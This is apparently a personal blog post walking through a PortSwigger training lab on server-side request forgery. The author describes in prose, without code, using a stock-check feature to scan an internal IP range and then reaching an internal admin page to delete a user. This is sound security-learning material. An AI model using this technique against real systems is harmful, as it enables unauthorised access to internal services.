SSRF Notes: PortSwigger Labs

 

Lab 2: Basic SSRF against another back-end system

TaskThis lab has a stock check feature that fetches data from an internal system.

To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user Carlos.

This Lab is just slightly different from the previous lab, we need to use the SSRF vulnerability to scan the internal server and find the right host serving a web app on port 8080 and then delete the user Carlos. The stock check functionality remains the same as in the previous lab:



The stock check URL is now different, pointing to an internal non-routable IP address.


Using Burp Intruder we brute force and found the host at 192.168.0.170.


We then send a request to delete the user Carlos.



And that's it we solved the lab.


All of these labs feel too easy so am gonna skip the write-up on the easy ones from this point forward, otherwise, I feel I won't make significant progress. I can't wait to start solving the CTF challenges.



Comments

  1. i just love to see you explaining stuffs, you're really good at that because you don't skip anything..
    well, hopefully we gonna learn alot here. waiting to see how you deal with more complex challanges.

    ReplyDelete

Post a Comment

Popular posts from this blog

Before You Dive In...

OverTheWire: Bandit Lab

SSRF Notes: PortSwigger Labs Continued